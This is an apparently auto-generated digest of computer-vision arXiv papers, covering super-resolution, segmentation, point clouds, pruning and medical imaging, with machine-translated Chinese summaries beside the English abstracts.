    Abstract Look-up table(LUT)-based methods have shown the great efficacy in single image super-resolution (SR) task. However, previous methods ignore the essential reason of restricted receptive field (RF) size in LUT, which is caused by the interaction of space and channel features in vanilla convolution. They can only increase the RF at the cost of linearly increasing LUT size. To enlarge RF with contained LUT sizes, we propose a novel Reconstructed Convolution(RC) module, which decouples channel-wise and spatial calculation. It can be formulated as $n^2$ 1D LUTs to maintain $n\times n$ receptive field, which is obviously smaller than $n\times n$D LUT formulated before. The LUT generated by our RC module reaches less than 1/10000 storage compared with SR-LUT baseline. The proposed Reconstructed Convolution module based LUT method, termed as RCLUT, can enlarge the RF size by 9 times than the state-of-the-art LUT-based SR method and achieve superior performance on five popular benchmark dataset. Moreover, the efficient and robust RC module can be used as a plugin to improve other LUT-based SR methods. The code is available at https://github.com/liuguandu/RC-LUT.
    摘要 Look-up table(LUT)基本方法在单图超解像(SR)任务中表现出色。然而,之前的方法忽视了LUT中受限的接收场(RF)大小的重要原因,这是因为混合空间和通道特征导致的vanilla convolution中的交互作用。它们只能通过linearly增加LUT大小来增加RF。为了使RF增加而不是LUT大小,我们提出了一种新的Reconstructed Convolution(RC)模块,它可以将通道和空间计算解耦。它可以表示为n^2个1D LUT,以维持n×n的接收场,这比之前的n×nD LUT更小。我们的RC模块生成的LUT可以达到与SR-LUT基准值的less than 1/10000的存储量。我们提出的Reconstructed Convolution模块基于LUT方法,称为RCLUT,可以将RF大小提高9倍于当前LUT基本SR方法,并在五个流行的benchmark dataset上达到更高的性能。此外,RC模块可以作为LUT基本SR方法的插件来改进其性能。代码可以在https://github.com/liuguandu/RC-LUT中找到。
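One plausible reading of how n^2 1D LUTs cover an n x n receptive field is sketched below: each offset in the neighbourhood has its own 1D table mapping a single pixel value to a contribution, and the contributions are summed. This omits the channel-wise part of the RC module and how the LUT values are trained; it only illustrates the storage argument:

```python
import numpy as np

def rc_lut_apply(img, luts, n=3):
    """img: (H, W) uint8 image. luts: (n*n, 256) float arrays, one 1D look-up table
    per offset inside the n x n neighbourhood. Each neighbouring pixel is mapped
    independently through its own LUT and the contributions are summed, giving an
    n x n receptive field with only n*n*256 stored entries."""
    pad = n // 2
    padded = np.pad(img, pad, mode="edge")
    out = np.zeros(img.shape, dtype=np.float32)
    offsets = [(dy, dx) for dy in range(n) for dx in range(n)]
    for idx, (dy, dx) in enumerate(offsets):
        shifted = padded[dy:dy + img.shape[0], dx:dx + img.shape[1]]
        out += luts[idx][shifted]          # per-offset 1D table lookup
    return out
```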

Variational Probabilistic Fusion Network for RGB-T Semantic Segmentation

  • paper_url: http://arxiv.org/abs/2307.08536
  • repo_url: None
  • paper_authors: Baihong Lin, Zengrong Lin, Yulan Guo, Yulan Zhang, Jianxiao Zou, Shicai Fan
  • for: 本研究旨在提高RGB-T semantic segmentation的精度和稳定性,以应对具有差异光照条件的困难景象。
  • methods: 本研究提出了一种新的Variational Probabilistic Fusion Network(VPFNet),它视融合特征为Random Variables,通过多个抽象样本来实现稳定的分类。在VPFNet中,Variational Feature Fusion Module(VFFM)通过差异注意力来实现随机样本生成。此外,为了避免类归一致和模式偏好,我们使用了Weighted Cross-Entropy损失函数,并在VFFM中引入了灯光和类别的先验信息。
  • results: 实验结果表明,提出的VPFNet可以在MFNet和PST900 dataset上达到当今最佳的分类性能。
    Abstract RGB-T semantic segmentation has been widely adopted to handle hard scenes with poor lighting conditions by fusing different modality features of RGB and thermal images. Existing methods try to find an optimal fusion feature for segmentation, resulting in sensitivity to modality noise, class-imbalance, and modality bias. To overcome the problems, this paper proposes a novel Variational Probabilistic Fusion Network (VPFNet), which regards fusion features as random variables and obtains robust segmentation by averaging segmentation results under multiple samples of fusion features. The random samples generation of fusion features in VPFNet is realized by a novel Variational Feature Fusion Module (VFFM) designed based on variation attention. To further avoid class-imbalance and modality bias, we employ the weighted cross-entropy loss and introduce prior information of illumination and category to control the proposed VFFM. Experimental results on MFNet and PST900 datasets demonstrate that the proposed VPFNet can achieve state-of-the-art segmentation performance.
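The sampling-and-averaging step described in the abstract can be sketched with a standard reparameterised Gaussian over the fusion features; `decoder` and the assumed Gaussian parameterisation are placeholders for the paper's VFFM and segmentation head:

```python
import torch

def fused_segmentation(mu, log_var, decoder, n_samples=8):
    """mu, log_var: (B, C, H, W) parameters of the fusion-feature distribution
    predicted from the RGB and thermal branches. decoder(z) -> segmentation logits.
    Averaging predictions over several reparameterised samples yields a result
    that is less sensitive to modality noise."""
    probs = 0.0
    for _ in range(n_samples):
        z = mu + torch.exp(0.5 * log_var) * torch.randn_like(mu)   # reparameterisation
        probs = probs + torch.softmax(decoder(z), dim=1)
    return probs / n_samples
```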

Multi-class point cloud completion networks for 3D cardiac anatomy reconstruction from cine magnetic resonance images

  • paper_url: http://arxiv.org/abs/2307.08535
  • repo_url: None
  • paper_authors: Marcel Beetz, Abhirup Banerjee, Julius Ossenberg-Engels, Vicente Grau
  • For: 这个论文的目的是提出一种全自动的三维心脏形态重建方法,以便从硬件磁共振成像(cine MRI)获得三维心脏形态模型。* Methods: 这个方法使用了一种多类点云完成网络(PCCN)来解决3D重建任务中的稀疏性和重合性问题。PCCN在大量的synthetic数据集上进行了评估,并与标准 Referenced anatomy 之间的Chamfer距离在不同的扭曲程度下都在或类似于图像分辨率下。此外,与3D U-Net Referenced 模型相比,PCCN减少了重建错误的比例,即 Hausdorff 距离和平均表面距离减少了32%和24%。* Results: 然后,作者使用PCCN作为自动重建管道的一部分,对UK Biobank研究中的1000名参与者进行了cross-domain传送。结果显示,PCCN可以重建 precisemedical 和可靠的三维心脏形态模型,并与之前的 литераature 中的临床指标相符。此外,作者还调查了该方法的稳定性,并发现它可以成功处理多种常见异常情况。
    Abstract Cine magnetic resonance imaging (MRI) is the current gold standard for the assessment of cardiac anatomy and function. However, it typically only acquires a set of two-dimensional (2D) slices of the underlying three-dimensional (3D) anatomy of the heart, thus limiting the understanding and analysis of both healthy and pathological cardiac morphology and physiology. In this paper, we propose a novel fully automatic surface reconstruction pipeline capable of reconstructing multi-class 3D cardiac anatomy meshes from raw cine MRI acquisitions. Its key component is a multi-class point cloud completion network (PCCN) capable of correcting both the sparsity and misalignment issues of the 3D reconstruction task in a unified model. We first evaluate the PCCN on a large synthetic dataset of biventricular anatomies and observe Chamfer distances between reconstructed and gold standard anatomies below or similar to the underlying image resolution for multiple levels of slice misalignment. Furthermore, we find a reduction in reconstruction error compared to a benchmark 3D U-Net by 32% and 24% in terms of Hausdorff distance and mean surface distance, respectively. We then apply the PCCN as part of our automated reconstruction pipeline to 1000 subjects from the UK Biobank study in a cross-domain transfer setting and demonstrate its ability to reconstruct accurate and topologically plausible biventricular heart meshes with clinical metrics comparable to the previous literature. Finally, we investigate the robustness of our proposed approach and observe its capacity to successfully handle multiple common outlier conditions.
    摘要 电影磁共振成像（cine MRI）是当前评估心脏解剖与功能的金标准。然而，它通常只能获取心脏三维解剖结构的一组二维（2D）切片图像，从而限制了对健康和病理心脏形态与生理的理解和分析。在这篇论文中，我们提出了一种全自动的表面重建管线，能够从原始cine MRI采集数据重建多类三维心脏解剖网格。其关键组件是一种多类点云补全网络（PCCN），可以在统一的模型中同时纠正三维重建任务中的稀疏性和错位问题。我们首先在一个大规模的双心室解剖合成数据集上评估PCCN，观察到在多种切片错位程度下，重建结果与金标准解剖之间的Chamfer距离均低于或接近底层图像分辨率。此外，与基准3D U-Net相比，PCCN在Hausdorff距离和平均表面距离上的重建误差分别降低了32%和24%。随后，我们将PCCN作为自动重建管线的一部分，在跨域迁移设置下应用于UK Biobank研究中的1000名受试者，结果显示它能够重建准确且拓扑合理的双心室心脏网格，临床指标与已有文献相当。最后，我们考察了所提方法的鲁棒性，发现它能成功处理多种常见的异常情况。

Multi-Domain Learning with Modulation Adapters

  • paper_url: http://arxiv.org/abs/2307.08528
  • repo_url: None
  • paper_authors: Ekaterina Iakovleva, Karteek Alahari, Jakob Verbeek
  • for: 这篇论文是为了解决多个领域的图像分类问题,以及对不同领域的图像进行共同训练。
  • methods: 这篇论文使用了卷积 neural network,并将卷积权重更新为每个任务的对应领域特有的权重。
  • results: 这篇论文在Visual Decathlon挑战和ImageNet-to-Sketch benchmark上取得了出色的结果,其精度与现有的州先进方法相似或更高。
    Abstract Deep convolutional networks are ubiquitous in computer vision, due to their excellent performance across different tasks for various domains. Models are, however, often trained in isolation for each task, failing to exploit relatedness between tasks and domains to learn more compact models that generalise better in low-data regimes. Multi-domain learning aims to handle related tasks, such as image classification across multiple domains, simultaneously. Previous work on this problem explored the use of a pre-trained and fixed domain-agnostic base network, in combination with smaller learnable domain-specific adaptation modules. In this paper, we introduce Modulation Adapters, which update the convolutional filter weights of the model in a multiplicative manner for each task. Parameterising these adaptation weights in a factored manner allows us to scale the number of per-task parameters in a flexible manner, and to strike different parameter-accuracy trade-offs. We evaluate our approach on the Visual Decathlon challenge, composed of ten image classification tasks across different domains, and on the ImageNet-to-Sketch benchmark, which consists of six image classification tasks. Our approach yields excellent results, with accuracies that are comparable to or better than those of existing state-of-the-art approaches.
    摘要 深度卷积网络在计算机视觉领域应用广泛，因为它们在不同领域的各类任务上表现出色。然而，模型通常针对每个任务单独训练，未能利用任务和领域之间的相关性来学习更紧凑、在低数据情形下泛化更好的模型。多域学习旨在同时处理相关的任务，例如跨多个域的图像分类。先前的工作使用预训练且固定的、与域无关的基础网络，并结合更小的可学习的域特定适配模块。在这篇论文中，我们引入了调制适配器（Modulation Adapters），它们以乘法方式为每个任务更新模型的卷积滤波器权重。通过以因子化的方式参数化这些适配权重，我们可以灵活地调整每个任务的参数数量，并在参数量与准确率之间取得不同的折中。我们在Visual Decathlon挑战（由十个不同域的图像分类任务组成）和由六个图像分类任务组成的ImageNet-to-Sketch基准上评估了我们的方法，取得了出色的结果，其准确率与现有最先进方法相当或更高。
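The multiplicative, factored modulation can be sketched as follows; the rank-1 factorisation over output and input channels is one plausible choice and not necessarily the paper's exact parameterisation:

```python
import torch
import torch.nn as nn
import torch.nn.functional as F

class ModulatedConv2d(nn.Module):
    """Shared 3x3 filters, multiplied element-wise by a per-domain modulation that
    is factored over output and input channels to keep per-domain parameters small."""
    def __init__(self, in_ch, out_ch, num_domains, rank=1):
        super().__init__()
        self.weight = nn.Parameter(torch.randn(out_ch, in_ch, 3, 3) * 0.02)
        self.mod_out = nn.Parameter(torch.ones(num_domains, out_ch, rank))
        self.mod_in = nn.Parameter(torch.ones(num_domains, rank, in_ch))

    def forward(self, x, domain):
        mod = self.mod_out[domain] @ self.mod_in[domain]        # (out_ch, in_ch)
        w = self.weight * mod[:, :, None, None]                 # multiplicative update
        return F.conv2d(x, w, padding=1)
```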

BUS:Efficient and Effective Vision-language Pre-training with Bottom-Up Patch Summarization

  • paper_url: http://arxiv.org/abs/2307.08504
  • repo_url: None
  • paper_authors: Chaoya Jiang, Haiyang Xu, Wei Ye, Qinghao Ye, Chenliang Li, Ming Yan, Bin Bi, Shikun Zhang, Fei Huang, Songfang Huang
  • for: 这个论文主要旨在提高 ViT 模型在视觉语言理解和生成任务中的训练效率,而不 sacrifi 性能。
  • methods: 该论文提出了一种自底向上的块概括方法，称为 Bottom-Up Patch Summarization (BUS)，它协调 ViT 骨干内的底层块提取与骨干外的顶层块抽象，以高效地学习长视觉 token 序列的简洁概括。
  • results: 该论文在多个视觉语言理解和生成任务中表现竞争力强,而且可以提高训练效率达 50%,同时保持或者提高效果。此外,该模型在增加输入图像分辨率时可以不增加计算成本,而达到领先的性能。
    Abstract Vision Transformer (ViT) based Vision-Language Pre-training (VLP) models have demonstrated impressive performance in various tasks. However, the lengthy visual token sequences fed into ViT can lead to training inefficiency and ineffectiveness. Existing efforts address the challenge by either bottom-level patch extraction in the ViT backbone or top-level patch abstraction outside, not balancing training efficiency and effectiveness well. Inspired by text summarization in natural language processing, we propose a Bottom-Up Patch Summarization approach named BUS, coordinating bottom-level extraction and top-level abstraction to learn a concise summary of lengthy visual token sequences efficiently. Specifically, We incorporate a Text-Semantics-Aware Patch Selector (TSPS) into the ViT backbone to perform a coarse-grained visual token extraction and then attach a flexible Transformer-based Patch Abstraction Decoder (PAD) upon the backbone for top-level visual abstraction. This bottom-up collaboration enables our BUS to yield high training efficiency while maintaining or even improving effectiveness. We evaluate our approach on various visual-language understanding and generation tasks and show competitive downstream task performance while boosting the training efficiency by 50\%. Additionally, our model achieves state-of-the-art performance on many downstream tasks by increasing input image resolution without increasing computational costs over baselines.
    摘要 视Transformer(ViT)基于视力语言预训练(VLP)模型在不同任务中表现出色。然而,在ViT中长时间的视觉 токен序列可能会导致训练不fficient和不effective。现有的尝试解决这个挑战是通过ViT backbone中的底层 patch抽取或者外部的top-level patch抽象,但这些方法并不能很好地寻求训练效率和效果的平衡。以文本概要为引yles,我们提出了底层 patch概要approach(BUS),通过协同底层抽取和顶层抽象来学习长时间的视觉 токен序列高效简洁的概要。specifically,我们在ViT backbone中添加了文本 semantics-aware patch selector(TSPS),以进行粗粒度的视觉 токен抽取,然后在backbone上添加一个灵活的 transformer-based patch abstraction decoder(PAD),以进行顶层视觉抽象。这种底层协同使得我们的BUS可以高效地进行训练,同时保持或者提高效果。我们在不同的视力语言理解和生成任务上评估了我们的方法,并显示了与基eline相比的50%的训练效率提升,同时在许多下游任务上达到了state-of-the-art的性能。此外,我们的模型可以在不变 computational costs的情况下,提高输入图像的分辨率,从而实现更好的下游任务性能。

Study of Vision Transformers for Covid-19 Detection from Chest X-rays

  • paper_url: http://arxiv.org/abs/2307.09402
  • repo_url: None
  • paper_authors: Sandeep Angara, Sharath Thirunagaru
  • for: 这种研究旨在检测 COVID-19 使用视transformer 技术,以提高检测效率和准确率。
  • methods: 本研究使用了许多最新的 transformer 模型,包括 Vision Transformer (ViT)、Swin-transformer、Max vision transformer (MViT) 和 Pyramid Vision transformer (PVT),通过转移学习IMAGENET 的 weights,实现了惊人的准确率范围为 98.75% 到 99.5%。
  • results: 实验结果表明，视transformer 在 COVID-19 检测中达到了 state-of-the-art 性能，优于传统方法甚至卷积神经网络 (CNNs)。这些结果表明了视transformer 作为 COVID-19 检测工具的潜力，有助于提高临床环境中筛查和诊断的效率与准确率。
    Abstract The COVID-19 pandemic has led to a global health crisis, highlighting the need for rapid and accurate virus detection. This research paper examines transfer learning with vision transformers for COVID-19 detection, known for its excellent performance in image recognition tasks. We leverage the capability of Vision Transformers to capture global context and learn complex patterns from chest X-ray images. In this work, we explored the recent state-of-art transformer models to detect Covid-19 using CXR images such as vision transformer (ViT), Swin-transformer, Max vision transformer (MViT), and Pyramid Vision transformer (PVT). Through the utilization of transfer learning with IMAGENET weights, the models achieved an impressive accuracy range of 98.75% to 99.5%. Our experiments demonstrate that Vision Transformers achieve state-of-the-art performance in COVID-19 detection, outperforming traditional methods and even Convolutional Neural Networks (CNNs). The results highlight the potential of Vision Transformers as a powerful tool for COVID-19 detection, with implications for improving the efficiency and accuracy of screening and diagnosis in clinical settings.
    摘要 COVID-19 疫情引发了全球健康危机，凸显了快速、准确的病毒检测需求。这篇研究论文考察了将基于视觉Transformer的迁移学习用于COVID-19检测，该类模型以其在图像识别任务中的出色表现而著称。我们利用视觉Transformer捕捉全局上下文并从胸部X光图像中学习复杂模式的能力。在这项工作中，我们探索了最新的Transformer模型用于基于CXR图像的COVID-19检测，包括Vision Transformer (ViT)、Swin-transformer、Max vision transformer (MViT) 和 Pyramid Vision transformer (PVT)。通过使用ImageNet权重进行迁移学习，这些模型在COVID-19检测中实现了98.75%到99.5%的准确率。我们的实验表明，视觉Transformer在COVID-19检测中达到了最先进 (state-of-the-art) 的性能，超越了传统方法乃至卷积神经网络 (CNNs)。这些结果表明视觉Transformer有潜力成为COVID-19检测的有力工具，有助于提高临床环境中筛查与诊断的效率和准确率。
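A generic fine-tuning setup of an ImageNet-pretrained vision transformer on a chest X-ray dataset is sketched below with the timm library. The model name, class count, optimizer, and hyperparameters are illustrative; they are not the paper's exact configuration, and `train_set` is an assumed dataset object:

```python
import timm
import torch
from torch.utils.data import DataLoader

# Assumed: `train_set` yields (image_tensor, label) pairs for COVID vs. normal CXRs.
model = timm.create_model("vit_base_patch16_224", pretrained=True, num_classes=2)
optimizer = torch.optim.AdamW(model.parameters(), lr=3e-5, weight_decay=0.01)
criterion = torch.nn.CrossEntropyLoss()

model.train()
for images, labels in DataLoader(train_set, batch_size=16, shuffle=True):
    optimizer.zero_grad()
    loss = criterion(model(images), labels)
    loss.backward()
    optimizer.step()
```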

Cumulative Spatial Knowledge Distillation for Vision Transformers

  • paper_url: http://arxiv.org/abs/2307.08500
  • repo_url: None
  • paper_authors: Borui Zhao, Renjie Song, Jiajun Liang
  • for: 本研究旨在提高vision transformer(ViT)的性能,通过吸取 convolutional neural networks(CNN)的知识。
  • methods: 本研究提出了Cumulative Spatial Knowledge Distillation(CSKD)方法,通过从CNN的相应的空间响应中提取空间知识,对ViT的所有patchtoken进行适应。此外,CSKD还使用了Cumulative Knowledge Fusion(CKF)模块,通过在训练过程中逐渐增加CNN的全局响应的重要性,使得ViT能够在训练早期充分利用CNN的地方适应,在训练后期更好地利用ViT的全局能力。
  • results: 对于ImageNet-1k和下游 dataset,CSKD获得了超越原始ViT的性能。 code将公开。
    Abstract Distilling knowledge from convolutional neural networks (CNNs) is a double-edged sword for vision transformers (ViTs). It boosts the performance since the image-friendly local-inductive bias of CNN helps ViT learn faster and better, but leading to two problems: (1) Network designs of CNN and ViT are completely different, which leads to different semantic levels of intermediate features, making spatial-wise knowledge transfer methods (e.g., feature mimicking) inefficient. (2) Distilling knowledge from CNN limits the network convergence in the later training period since ViT's capability of integrating global information is suppressed by CNN's local-inductive-bias supervision. To this end, we present Cumulative Spatial Knowledge Distillation (CSKD). CSKD distills spatial-wise knowledge to all patch tokens of ViT from the corresponding spatial responses of CNN, without introducing intermediate features. Furthermore, CSKD exploits a Cumulative Knowledge Fusion (CKF) module, which introduces the global response of CNN and increasingly emphasizes its importance during the training. Applying CKF leverages CNN's local inductive bias in the early training period and gives full play to ViT's global capability in the later one. Extensive experiments and analysis on ImageNet-1k and downstream datasets demonstrate the superiority of our CSKD. Code will be publicly available.
    摘要 精炼知识从卷积神经网络(CNN)是视transformer(ViT)的双刃剑。它会提高性能,因为图像友好的本地推导性(local-inductive bias)在CNN中帮助ViT更快速地学习和提高性能,但也存在两个问题:(1)CNN和ViT的网络设计完全不同,导致它们的中间特征semantic level不同,使得空间知识传递方法(例如特征模仿)不efficient。(2)从CNN精炼知识限制了ViT的网络迁移在后期训练中,因为ViT的全球信息整合能力被CNN的本地推导性supervise。为此,我们提出了积累的空间知识填充(CSKD)。CSKD将从CNN的相应空间响应中精炼到ViT的所有patchtoken中的空间知识,而不需要中间特征。此外,CSKD还利用了积累知识融合(CKF)模块,该模块在训练中逐渐增加CNN的全球响应的重要性,从而利用CNN的本地推导性在初期训练中,并让ViT在后期训练中发挥全球能力。我们在ImageNet-1k和下游数据集上进行了广泛的实验和分析,并证明了我们的CSKD的优越性。代码将在公共可用。
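A simplified sketch of the distillation objective is given below: each ViT patch token is matched to the CNN response at the corresponding location, and a global CNN response is mixed in with a weight that grows as training progresses (the cumulative fusion). The exact matching, temperature, and schedule are simplified assumptions:

```python
import torch
import torch.nn.functional as F

def cskd_loss(vit_patch_logits, cnn_spatial_logits, cnn_global_logits, progress, tau=4.0):
    """vit_patch_logits: (B, N, C) per-patch predictions from the ViT student.
    cnn_spatial_logits: (B, N, C) CNN teacher predictions at the matching locations.
    cnn_global_logits:  (B, C) CNN teacher global prediction.
    progress in [0, 1]: fraction of training done; the global target's weight grows with it."""
    target = (1.0 - progress) * cnn_spatial_logits + progress * cnn_global_logits.unsqueeze(1)
    log_p = F.log_softmax(vit_patch_logits / tau, dim=-1)
    q = F.softmax(target / tau, dim=-1)
    return F.kl_div(log_p, q, reduction="batchmean") * tau * tau
```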

SVDFormer: Complementing Point Cloud via Self-view Augmentation and Self-structure Dual-generator

  • paper_url: http://arxiv.org/abs/2307.08492
  • repo_url: https://github.com/czvvd/svdformer
  • paper_authors: Zhe Zhu, Honghua Chen, Xing He, Weiming Wang, Jing Qin, Mingqiang Wei
  • for: 本文提出了一种新型网络SVDFormer,用于解决 incomplete point cloud 的两个特定挑战:理解完整的全球形状和生成高精度的本地结构。现有方法通常只使用三维坐标来识别形状模式,或者带有良好准备的颜色图像来引导geometry estimation的缺失部分。但这些方法并不总是能充分利用cross-modal自身结构来完成高质量的点云完成。
  • methods: 我们首先设计了一个Self-view Fusion Network,利用多视图深度图像信息来观察不完整的自身形状并生成一个紧凑的全球形状。然后,我们引入了一个改进模块,叫Self-structure Dual-generator,其中我们将学习的形状假设和地理自相似性 incorporated into producing new points。通过识别每个点的不完整性,我们实现了DUAL-PATH设计,使得各种精度的精细结构可以被独立地识别和修复。
  • results: 我们的方法在 widely-used benchmarks 上 achieve state-of-the-art performance。代码将在 https://github.com/czvvd/SVDFormer 上发布。
    Abstract In this paper, we propose a novel network, SVDFormer, to tackle two specific challenges in point cloud completion: understanding faithful global shapes from incomplete point clouds and generating high-accuracy local structures. Current methods either perceive shape patterns using only 3D coordinates or import extra images with well-calibrated intrinsic parameters to guide the geometry estimation of the missing parts. However, these approaches do not always fully leverage the cross-modal self-structures available for accurate and high-quality point cloud completion. To this end, we first design a Self-view Fusion Network that leverages multiple-view depth image information to observe incomplete self-shape and generate a compact global shape. To reveal highly detailed structures, we then introduce a refinement module, called Self-structure Dual-generator, in which we incorporate learned shape priors and geometric self-similarities for producing new points. By perceiving the incompleteness of each point, the dual-path design disentangles refinement strategies conditioned on the structural type of each point. SVDFormer absorbs the wisdom of self-structures, avoiding any additional paired information such as color images with precisely calibrated camera intrinsic parameters. Comprehensive experiments indicate that our method achieves state-of-the-art performance on widely-used benchmarks. Code will be available at https://github.com/czvvd/SVDFormer.
    摘要 在这篇论文中,我们提出了一种新的网络,即SVDFormer,以解决Point cloud completion中的两个特定挑战:理解完整的全球形态从不完整的点云中,并生成高精度的本地结构。现有方法可以通过只使用3D坐标来识别形态模式,或者从外部Import预先calibrated的颜色图像来导航点云中缺失部分的准确性。但这些方法并不总能充分利用点云之间的自同构信息,以实现高质量的完成。为此,我们首先设计了一个自我融合网络,利用多视图深度图像信息来观察不完整的自身形态,并生成一个紧凑的全球形态。为了揭示高精度的结构,我们然后引入了一个改进模块,即自身结构双生成器,在其中我们利用学习的形态规范和几何自相似性来生成新的点。通过识别每个点的不完整性,我们的双路设计分离了各种精度的修正策略。SVDFormer利用自身结构的智慧,不需要任何额外的对应信息,如预先calibrated的颜色图像。广泛的实验表明,我们的方法在常用的 benchmark 上达到了领先的性能。代码将在https://github.com/czvvd/SVDFormer 上提供。

Differentiable Transportation Pruning

  • paper_url: http://arxiv.org/abs/2307.08483
  • repo_url: None
  • paper_authors: Yunqiang Li, Jan C. van Gemert, Torsten Hoefler, Bert Moons, Evangelos Eleftheriou, Bram-Ernst Verhoef
  • for: 该论文旨在提出一种高效的深度学习模型压缩方法,以便在边缘设备上部署深度学习模型。
  • methods: 该方法使用了一种高效的优化交通算法,该算法通过自动调整搜索-利用行为来找到精准的稀疏子网络。
  • results: 该方法可以在3个不同的数据集上,使用5种不同的模型,在各种压缩比例下,与之前的压缩方法进行比较,并且可以在不同的稀疏预算和压缩粒度下实现状态的最佳性能。
    Abstract Deep learning algorithms are increasingly employed at the edge. However, edge devices are resource constrained and thus require efficient deployment of deep neural networks. Pruning methods are a key tool for edge deployment as they can improve storage, compute, memory bandwidth, and energy usage. In this paper we propose a novel accurate pruning technique that allows precise control over the output network size. Our method uses an efficient optimal transportation scheme which we make end-to-end differentiable and which automatically tunes the exploration-exploitation behavior of the algorithm to find accurate sparse sub-networks. We show that our method achieves state-of-the-art performance compared to previous pruning methods on 3 different datasets, using 5 different models, across a wide range of pruning ratios, and with two types of sparsity budgets and pruning granularities.
    摘要 深度学习算法在边缘设备上的部署越来越普遍。然而,边缘设备资源有限,因此需要高效地部署深度神经网络。剪枝方法是边缘部署中的关键工具,可以改善存储、计算、内存带宽和能耗。在这篇论文中,我们提出了一种新的精准剪枝技术,可以精确控制输出网络的大小。我们的方法使用高效的最优传输方案,并将其实现为端到端可微分,同时自动调整算法的探索-利用行为,以找到精准的稀疏子网络。实验表明,与之前的剪枝方法相比,我们的方法在三个数据集上、使用五种模型、在各种剪枝比率以及两种稀疏预算和剪枝粒度下均达到了最先进的性能。

SkeletonMAE: Graph-based Masked Autoencoder for Skeleton Sequence Pre-training

  • paper_url: http://arxiv.org/abs/2307.08476
  • repo_url: https://github.com/hongyan1123/skeletonmae
  • paper_authors: Hong Yan, Yang Liu, Yushen Wei, Zhen Li, Guanbin Li, Liang Lin
  • for: 这 paper 的目的是提出一种高效的人体序列学习框架,以便在不同的数据集上进行自动识别人体动作。
  • methods: 该 paper 使用了一种非对称的基于图的编码器-解码器预训练架构,named SkeletonMAE,以及一种Spatiotemporal Representation Learning(STRL)模块,以完全捕捉人体姿势和获得有效的人体序列表示。
  • results: 该 paper 的实验结果表明,该方法可以在不同的数据集上提供优秀的自动识别人体动作性能,并且与一些完全监督的方法相当。
    Abstract Skeleton sequence representation learning has shown great advantages for action recognition due to its promising ability to model human joints and topology. However, the current methods usually require sufficient labeled data for training computationally expensive models, which is labor-intensive and time-consuming. Moreover, these methods ignore how to utilize the fine-grained dependencies among different skeleton joints to pre-train an efficient skeleton sequence learning model that can generalize well across different datasets. In this paper, we propose an efficient skeleton sequence learning framework, named Skeleton Sequence Learning (SSL). To comprehensively capture the human pose and obtain discriminative skeleton sequence representation, we build an asymmetric graph-based encoder-decoder pre-training architecture named SkeletonMAE, which embeds skeleton joint sequence into Graph Convolutional Network (GCN) and reconstructs the masked skeleton joints and edges based on the prior human topology knowledge. Then, the pre-trained SkeletonMAE encoder is integrated with the Spatial-Temporal Representation Learning (STRL) module to build the SSL framework. Extensive experimental results show that our SSL generalizes well across different datasets and outperforms the state-of-the-art self-supervised skeleton-based action recognition methods on FineGym, Diving48, NTU 60 and NTU 120 datasets. Additionally, we obtain comparable performance to some fully supervised methods. The code is available at https://github.com/HongYan1123/SkeletonMAE.
    摘要 骨架序列表示学习由于能够建模人体关节及其拓扑结构,在动作识别中表现出显著优势。然而,当前方法通常需要大量标注数据来训练计算昂贵的模型,这既费时又费力。此外,这些方法忽略了如何利用不同骨架关节之间的细粒度依赖关系来预训练一个高效且能在不同数据集间良好泛化的骨架序列学习模型。在这篇论文中,我们提出了一种高效的骨架序列学习框架,名为Skeleton Sequence Learning(SSL)。为了全面捕捉人体姿势并获得有判别力的骨架序列表示,我们设计了一种非对称的基于图的编码器-解码器预训练架构,名为SkeletonMAE,它将骨架关节序列嵌入图卷积网络(GCN)中,并基于人体拓扑先验知识重建被掩蔽的关节和边。然后,我们将预训练的SkeletonMAE编码器与空间-时间表示学习(STRL)模块集成,构建SSL框架。大量实验结果显示,SSL可以在不同数据集上良好泛化,并在FineGym、Diving48、NTU 60和NTU 120数据集上超越最先进的自监督骨架动作识别方法。此外,我们还获得了与一些完全监督方法相当的性能。代码可以在https://github.com/HongYan1123/SkeletonMAE中找到。

EGE-UNet: an Efficient Group Enhanced UNet for skin lesion segmentation

  • paper_url: http://arxiv.org/abs/2307.08473
  • repo_url: https://github.com/jcruan519/ege-unet
  • paper_authors: Jiacheng Ruan, Mingye Xie, Jingsheng Gao, Ting Liu, Yuzhuo Fu
  • for: 这篇研究旨在提出一个更有效的医疗影像分类方法,以应对现有的过滤器和其变体在医疗应用中的问题。
  • methods: 本研究提出了一个名为Efficient Group Enhanced UNet(EGE-UNet)的方法,具有轻量级的设计和实现。EGE-UNet具有Group multi-axis Hadamard Product Attention(GHPA)和Group Aggregation Bridge(GAB)两个模块,可以实现多轴 Hadamard Product Attention Mechanism 和多尺度信息聚合。
  • results: 实验结果显示,EGE-UNet在 ISIC2017 和 ISIC2018 datasets 上的分类性能比较现有的状态顶对方法高,同时对应用程序的参数和计算负载也有了显著的减少(494倍和160倍)。此外,EGE-UNet 的参数数量只有 50KB,这是现有方法中首次出现的最小化参数数量。
    Abstract Transformer and its variants have been widely used for medical image segmentation. However, the large number of parameter and computational load of these models make them unsuitable for mobile health applications. To address this issue, we propose a more efficient approach, the Efficient Group Enhanced UNet (EGE-UNet). We incorporate a Group multi-axis Hadamard Product Attention module (GHPA) and a Group Aggregation Bridge module (GAB) in a lightweight manner. The GHPA groups input features and performs Hadamard Product Attention mechanism (HPA) on different axes to extract pathological information from diverse perspectives. The GAB effectively fuses multi-scale information by grouping low-level features, high-level features, and a mask generated by the decoder at each stage. Comprehensive experiments on the ISIC2017 and ISIC2018 datasets demonstrate that EGE-UNet outperforms existing state-of-the-art methods. In short, compared to the TransFuse, our model achieves superior segmentation performance while reducing parameter and computation costs by 494x and 160x, respectively. Moreover, to our best knowledge, this is the first model with a parameter count limited to just 50KB. Our code is available at https://github.com/JCruan519/EGE-UNet.
    摘要 Transformer 及其变种在医学影像分割中被广泛应用,但这些模型的参数量和计算负担使其不适用于移动医疗应用。为解决这个问题,我们提出了一种更高效的方法,即高效组增强 U-Net(EGE-UNet)。我们以轻量级的方式集成了分组多轴 Hadamard Product Attention 模块(GHPA)和 Group Aggregation Bridge 模块(GAB)。GHPA 将输入特征分组并在不同轴上执行 Hadamard Product Attention 机制(HPA),以从多个视角提取病灶信息。GAB 通过分组低级特征、高级特征以及每个阶段解码器生成的掩码,有效地融合多尺度信息。我们在 ISIC2017 和 ISIC2018 数据集上进行了全面的实验,结果表明 EGE-UNet 超过了现有的最先进方法。简而言之,与 TransFuse 相比,我们的模型实现了更高的分割性能,同时分别将参数量和计算成本降低了494倍和160倍。此外,据我们所知,这是首个参数量限制在50KB以下的模型。我们的代码可以在 https://github.com/JCruan519/EGE-UNet 中找到。

Riesz feature representation: scale equivariant scattering network for classification tasks

